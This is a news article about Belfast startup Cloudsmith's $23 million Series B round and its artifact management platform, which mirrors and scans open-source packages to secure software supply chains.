The software supply chain is notoriously porous: a reported 81% of codebases contain high- or critical-risk open source vulnerabilities. A single vulnerability can have a far-reaching impact on the wider software supply chain, as evidenced by the likes of the Log4Shell exploit that saw millions of applications exposed to potential remote code execution hacks via the Log4j logging library.

Northern Irish startup Cloudsmith is setting out to solve this exact problem with its cloud-native “artifact management platform,” which it touts as a more modern alternative to legacy software supply chain platforms such as JFrog or Sonatype.

To help drive its next phase of growth, the startup on Monday said it has raised $23 million in a Series B round of financing led by TCV, with participation from Insight Partners and some returning investors.

An “artifact,” in the context of Cloudsmith’s industry, refers to any software package, binary file or component that is created or distributed throughout the software development process. This could be libraries and their dependencies, configuration files, compiled applications, and more.

While a company will usually write its own code, it typically relies on third-party packages stored on public open-source registries. These packages are required at build-time (when the code is compiled into an executable format), but at that point, the package might have changed versions, or simply might not be available. This is where Cloudsmith enters the fray, serving “mirrors” of these packages.

“Cloudsmith serves as a private registry for these binary artifacts, so they’re always available for future builds, even if they change or disappear from their original sources,” Cloudsmith’s CEO Glenn Weinstein told TechCrunch. “Cloudsmith ensures builds are repeatable and reliable, and provides centralized
DevOps or platform engineering teams with visibility into what’s going into their production software.”

But even if a package is still available in an open-source repository, it can develop security issues over time due to lack of maintenance, or for more nefarious reasons. This is why Cloudsmith scans dependencies for vulnerabilities, licensing issues, and malware before exposing these packages to developers in their coding environments.

It’s worth noting that while Cloudsmith can support packages that its customers have developed in-house, the vast majority of artifacts stored on the platform are open-source packages from the usual indexes, including PyPi, Docker Hub, Maven Central, and Npmjs.

“All data and software flow through Cloudsmith, so Cloudsmith is a security checkpoint for open-source dependencies; it scans, curates, and blocks problematic artifacts before they reach production,” Weinstein said. “Cloudsmith also clears up a blind-spot many enterprises have in terms of clear oversight of what artifacts they use, whether private, public, or open-source.”

Founded in Belfast in 2016 by Alan Carson and CTO Lee Skillen, Cloudsmith had previously raised $26 million in a Series A round that started with $15 million in 2021 and finished with a further $11 million in 2023. The second tranche came shortly after Carson transitioned into the chief strategy officer role and Twilio chief customer officer Weinstein came in as CEO.

According to Carson, bringing in an experienced startup and scale-up entrepreneur enabled the two co-founders to focus more on the product “vision, roadmap and architecture,” while opening it to a wider array of enterprises and investors in the U.S. — including TCV and Insight Partners.

“These investors are a strong signal that Cloudsmith has shifted into category leadership,” Carson told TechCrunch over email. “Under Glenn’s leadership, Cloudsmith has pivoted squarely towards large enterprises and their challenges in controlling and securing their software supply chains, and in meeting rigorous compliance standards.”

Most of Cloudsmith’s 100 employees, including the two founders, are based in Belfast, but Weinstein says that around three-quarters of its revenue now comes from customers in the U.S..

With the fresh funding, Cloudsmith plans to hire across sales, marketing and customer success, as well as invest in R&D for new AI applications. Indeed, Weinstein said that it has a “unique opportunity” to transform vast banks of software package consumption data into “actionable insights” for developers.

“We want to help developers choose better, safer open-source packages,” Weinstein said. “We’ll do this by helping cybersecurity teams to create internal curated registries, where it’s easier for a developer to source a package from a curated internal repo than from a public registry.”

This will likely involve making recommendations, such as switching from a package that is rarely updated or is falling in popularity, to a similar package that other Cloudsmith customers have embraced.

“This is the advice developers rely on today, albeit informally — ‘hey, I heard about this package‘ — and turn it into instantly available advice via the Cloudsmith platform,” Weinstein said.